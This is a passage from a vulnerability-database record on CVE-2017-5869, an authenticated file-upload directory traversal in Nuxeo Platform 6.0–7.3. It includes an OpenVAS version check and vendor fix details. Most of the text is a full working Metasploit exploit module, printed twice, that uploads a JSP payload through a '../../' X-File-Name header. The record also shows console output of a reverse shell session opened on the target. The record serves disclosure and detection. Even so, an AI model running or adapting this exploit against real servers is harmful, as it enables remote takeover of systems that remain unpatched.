arbitrary location of the server \nfile system. \n \nIt is then possible to upload a JSP script to the root directory of the \nweb application to execute commands on the remote host operating system. \nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the \n``X-File-Name`` header is a way to do so. \n \n## Details \n \n**CVE ID**: CVE-2017-5869 \n \n**Access Vector**: network \n \n**Security Risk**: high \n \n**Vulnerability**: CWE-434 \n \n**CVSS Base Score**: 8.8 \n \n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H \n \n# Proof of Concept \n \nHere is a metasploit module to exploit this vulnerability: \n \n```ruby \n## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Nuxeo Platform File Upload RCE\", \n'Description' => %q{ \nThe Nuxeo Platform tool is vulnerable to an \nauthenticated remote code execution, \nthanks to an upload module. \n}, \n'License' => MSF_LICENSE, \n'Author' => ['Ronan Kervella \n<r.kervella@sysdream.com>'], \n'References' => \n[ \n['https://nuxeo.com/', ''] \n], \n'Platform' => %w{linux}, \n'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', \n'Platform' => 'linux'] ], \n'Arch' => ARCH_JAVA, \n'Privileged' => true, \n'Payload' => {}, \n'DisclosureDate' => \"\", \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path to the nuxeo \napplication', '/nuxeo']), \nOptString.new('USERNAME', [true, 'A valid username', '']), \nOptString.new('PASSWORD', [true, 'Password linked to the \nusername', '']) \n], self.class) \nend \n \ndef jsp_filename \n@jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp' \nend \n \ndef jsp_path \n'nxserver/nuxeo.war/' + jsp_filename \nend \n \ndef nuxeo_login \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/login.jsp') \n) \n \nfail_with(Failure::Unreachable, 'No response received from the \ntarget.') unless res \nsession_cookie = res.get_cookies \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/nxstartup.faces'), \n'cookie' => session_cookie, \n'vars_post' => { \n'user_name' => datastore['USERNAME'], \n'user_password' => datastore['PASSWORD'], \n'submit' => 'Connexion' \n} \n) \nreturn session_cookie if res && res.code == 302 && \nres.redirection.to_s.include?('view_home.faces') \nnil \nend \n \ndef trigger_shell \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, jsp_filename) \n) \nfail_with(Failure::Unknown, 'Unable to get \n#{full_uri}/#{jsp_filename}') unless res && res.code == 200 \nend \n \ndef exploit \nprint_status(\"Authenticating using \n#{datastore['USERNAME']}:#{datastore['PASSWORD']}\") \nsession_cookie = nuxeo_login \nif session_cookie \npayload_url = normalize_uri(target_uri.path, jsp_filename) \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, \n'/site/automation/batch/upload'), \n'cookie' => session_cookie, \n'headers' => { \n'X-File-Name' => '../../' + jsp_path, \n'X-Batch-Id' => '00', \n'X-File-Size' => '1024', \n'X-File-Type' => '', \n'X-File-Idx' => '0', \n'X-Requested-With' => 'XMLHttpRequest' \n}, \n'ctype' => '', \n'data' => payload.encoded \n) \nfail_with(Failure::Unknown, 'Unable to upload the payload') \nunless res && res.code == 200 \nprint_status(\"Executing the payload at \n#{normalize_uri(target_uri.path, payload_url)}.\") \ntrigger_shell \nelse \nfail_with(Failure::Unknown, 'Unable to login') \nend \nend \n \nend \n``` \n \nModule output: \n \n```bash \nmsf> use exploit/multi/http/nuxeo \nmsf exploit(nuxeo) > set USERNAME user1 \nUSERNAME => user1 \nmsf exploit(nuxeo) > set PASSWORD password \nPASSWORD => password \nmsf exploit(nuxeo) > set rhost 192.168.253.132 \nrhost => 192.168.253.132 \nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp \npayload => java/jsp_shell_reverse_tcp \nmsf exploit(nuxeo) > set lhost 192.168.253.1 \nlhost => 192.168.253.1 \nmsf exploit(nuxeo) > exploit \n \n[-] Handler failed to bind to 192.168.253.1:4444:- - \n[*] Started reverse TCP handler on 0.0.0.0:4444 \n[*] Authenticating using user1:password \n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp. \n[*] Command shell session 1 opened (172.17.0.2:4444 -> \n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000 \n \nid \nuid=1000(nuxeo) gid=1000(nuxeo) \ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare) \npwd \n/var/lib/nuxeo/server \n``` \n \n# Vulnerable code \n \nThe vulnerable code is located in the \n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github \nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)), \nwhere the header ``X-File-Name`` is not checked. \n \n# Fix \n \nNuxeo provided a \n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892) \nfor this issue. \nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35). \n \nPlease note that vulnerability does not affect Nuxeo versions above 7.3. \n \n# Affected versions \n \n* Nuxeo 6.0 (LTS 2014), released 2014-11-06 \n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15 \n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24 \n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24 \n \n# Unaffected versions \n \n* Nuxeo 6.0 HF35, released 2017-01-12 \n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02 \n* Nuxeo 7.10 (LTS 2015), released 2015-11-09 \n* Nuxeo 8.10 (LTS 2016), released 2016-12-06 \n \n# Credits \n \nRonan Kervella <r.kervella@sysdream.com> \n \n-- \nSYSDREAM Labs <labs@sysdream.com> \n \nGPG : \n47D1 E124 C43E F992 2A2E \n1551 8EB4 8CD9 D5B2 59A1 \n \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141811/nuxeo-shell.txt"}], "openvas": [{"lastseen": "2019-05-29T18:34:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5869"], "description": "Nuxeo Platform is prone to a authenticated directory traversal\nvulnerability.", "modified": "2018-10-26T00:00:00", "published": "2017-03-27T00:00:00", "id": "OPENVAS:1361412562310106696", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106696", "type": "openvas", "title": "Nuxeo Platform Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_nuxeo_platform_dir_trav_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Nuxeo Platform Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:nuxeo:platform\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106696\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-27 14:18:27 +0700 (Mon, 27 Mar 2017)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2017-5869\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Nuxeo Platform Directory Traversal Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_nuxeo_platform_detect.nasl\");\n script_mandatory_keys(\"nuxeo_platform/installed\");\n\n script_tag(name:\"summary\", value:\"Nuxeo Platform is prone to a authenticated directory traversal\nvulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Directory traversal vulnerability in the file import feature allows remote\nauthenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.\");\n\n script_tag(name:\"impact\", value:\"An authenticated attacker may upload and execute arbitrary JSP code.\");\n\n script_tag(name:\"affected\", value:\"Nuxeo Platform 6.0, 7.1, 7.2 and 7.3.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.4 or later.\");\n\n script_xref(name:\"URL\", value:\"http://www.openwall.com/lists/oss-security/2017/03/23/6\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_in_range(version: version, test_version: \"6.0\", test_version2: \"7.3\") || version == \"lts-2014\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.4\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nNuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)", "edition": 1, "published": "2017-03-27T00:00:00", "title": "Nuxeo 6.07.17.27.3 - Remote Code Execution (Metasploit)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-5869"], "modified": "2017-03-27T00:00:00", "id": "EXPLOITPACK:3BDE07924AD5019982D9337367D7DB4E", "href": "", "sourceData": "=begin\n# Description\n\nNuxeo Platform is a content management system for enterprises (CMS).\nIt embeds an Apache Tomcat server, and can be managed through a web\ninterface.\n\nOne of its features allows authenticated users to import files to the\nplatform.\nBy crafting the upload request with a specific ``X-File-Name`` header,\none can successfuly upload a file at an arbitrary location of the server\nfile system.\n\nIt is then possible to upload a JSP script to the root directory of the\nweb application to execute commands on the remote host operating system.\nSetting the value ``../../nxserver/nuxeo.war/shell.jsp`` to the\n``X-File-Name`` header is a way to do so.\n\n## Details\n\n**CVE ID**: CVE-2017-5869\n\n**Access Vector**: network\n\n**Security Risk**: high\n\n**Vulnerability**: CWE-434\n\n**CVSS Base Score**: 8.8\n\n**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n# Proof of Concept\n\nHere is a metasploit module to exploit this vulnerability:\n\n=end\n##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Nuxeo Platform File Upload RCE\",\n 'Description' => %q{\n The Nuxeo Platform tool is vulnerable to an authenticated remote code execution,\n thanks to an upload module.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ronan Kervella <r.kervella@sysdream.com>'],\n 'References' =>\n [\n ['https://nuxeo.com/', '']\n ],\n 'Platform' => %w{linux},\n 'Targets' => [ ['Nuxeo Platform 6.0 to 7.3', 'Platform' => 'linux'] ],\n 'Arch' => ARCH_JAVA,\n 'Privileged' => true,\n 'Payload' => {},\n 'DisclosureDate' => \"\",\n 'DefaultTarget' => 0))\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the nuxeo application', '/nuxeo']),\n OptString.new('USERNAME', [true, 'A valid username', '']),\n OptString.new('PASSWORD', [true, 'Password linked to the username', ''])\n ], self.class)\n end\n\n def jsp_filename\n @jsp_filename ||= Rex::Text::rand_text_alpha(8) + '.jsp'\n end\n\n def jsp_path\n 'nxserver/nuxeo.war/' + jsp_filename\n end\n\n def nuxeo_login\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/login.jsp')\n )\n\n fail_with(Failure::Unreachable, 'No response received from the target.') unless res\n session_cookie = res.get_cookies\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/nxstartup.faces'),\n 'cookie' => session_cookie,\n 'vars_post' => {\n 'user_name' => datastore['USERNAME'],\n 'user_password' => datastore['PASSWORD'],\n 'submit' => 'Connexion'\n }\n )\n return session_cookie if res && res.code == 302 && res.redirection.to_s.include?('view_home.faces')\n nil\n end\n\n def trigger_shell\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, jsp_filename)\n )\n fail_with(Failure::Unknown, 'Unable to get #{full_uri}/#{jsp_filename}') unless res && res.code == 200\n end\n\n def exploit\n print_status(\"Authenticating using #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n session_cookie = nuxeo_login\n if session_cookie\n payload_url = normalize_uri(target_uri.path, jsp_filename)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/site/automation/batch/upload'),\n 'cookie' => session_cookie,\n 'headers' => {\n 'X-File-Name' => '../../' + jsp_path,\n 'X-Batch-Id' => '00',\n 'X-File-Size' => '1024',\n 'X-File-Type' => '',\n 'X-File-Idx' => '0',\n 'X-Requested-With' => 'XMLHttpRequest'\n },\n 'ctype' => '',\n 'data' => payload.encoded\n )\n fail_with(Failure::Unknown, 'Unable to upload the payload') unless res && res.code == 200\n print_status(\"Executing the payload at #{normalize_uri(target_uri.path, payload_url)}.\")\n trigger_shell\n else\n fail_with(Failure::Unknown, 'Unable to login')\n end\n end\n\nend\n\n=begin\nModule output:\n\n```bash\nmsf> use exploit/multi/http/nuxeo\nmsf exploit(nuxeo) > set USERNAME user1\nUSERNAME => user1\nmsf exploit(nuxeo) > set PASSWORD password\nPASSWORD => password\nmsf exploit(nuxeo) > set rhost 192.168.253.132\nrhost => 192.168.253.132\nmsf exploit(nuxeo) > set payload java/jsp_shell_reverse_tcp\npayload => java/jsp_shell_reverse_tcp\nmsf exploit(nuxeo) > set lhost 192.168.253.1\nlhost => 192.168.253.1\nmsf exploit(nuxeo) > exploit\n\n[-] Handler failed to bind to 192.168.253.1:4444:- -\n[*] Started reverse TCP handler on 0.0.0.0:4444\n[*] Authenticating using user1:password\n[*] Executing the payload at /nuxeo/nuxeo/QBCefwxQ.jsp.\n[*] Command shell session 1 opened (172.17.0.2:4444 ->\n192.168.253.132:43279) at 2017-01-13 14:47:25 +0000\n\nid\nuid=1000(nuxeo) gid=1000(nuxeo)\ngroups=1000(nuxeo),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),110(sambashare)\npwd\n/var/lib/nuxeo/server\n```\n\n# Vulnerable code\n\nThe vulnerable code is located in the\n`org.nuxeo.ecm.restapi.server.jaxrs.BatchUploadObject` class ([github\nlink](https://github.com/nuxeo/nuxeo/blob/b05dde789a6c0c7b5f361608eb6d6bd0fda31f36/nuxeo-features/rest-api/nuxeo-rest-api-server/src/main/java/org/nuxeo/ecm/restapi/server/jaxrs/BatchUploadObject.java#L150)),\nwhere the header ``X-File-Name`` is not checked.\n\n# Fix\n\nNuxeo provided a\n[patch](https://github.com/nuxeo/nuxeo/commit/6b3113977ef6c2307f940849a2c196621ebf1892)\nfor this issue.\nA hotfix release is also available for Nuxeo 6.0 (Nuxeo 6.0 HF35).\n\nPlease note that vulnerability does not affect Nuxeo versions above 7.3.\n\n# Affected versions\n\n* Nuxeo 6.0 (LTS 2014), released 2014-11-06\n* Nuxeo 7.1 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-01-15\n* Nuxeo 7.2 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-03-24\n* Nuxeo 7.3 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-06-24\n\n# Unaffected versions\n\n* Nuxeo 6.0 HF35, released 2017-01-12\n* Nuxeo 7.4 (Fast Track, obsoleted by Nuxeo 7.10), released 2015-10-02\n* Nuxeo 7.10 (LTS 2015), released 2015-11-09\n* Nuxeo 8.10 (LTS 2016), released 2016-12-06\n\n# Credits\n\nRonan Kervella <r.kervella@sysdream.com>\n\n-- SYSDREAM Labs <labs@sysdream.com> \nGPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 \n* Website: https://sysdream.com/ \n* Twitter: @sysdream \n=end", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}
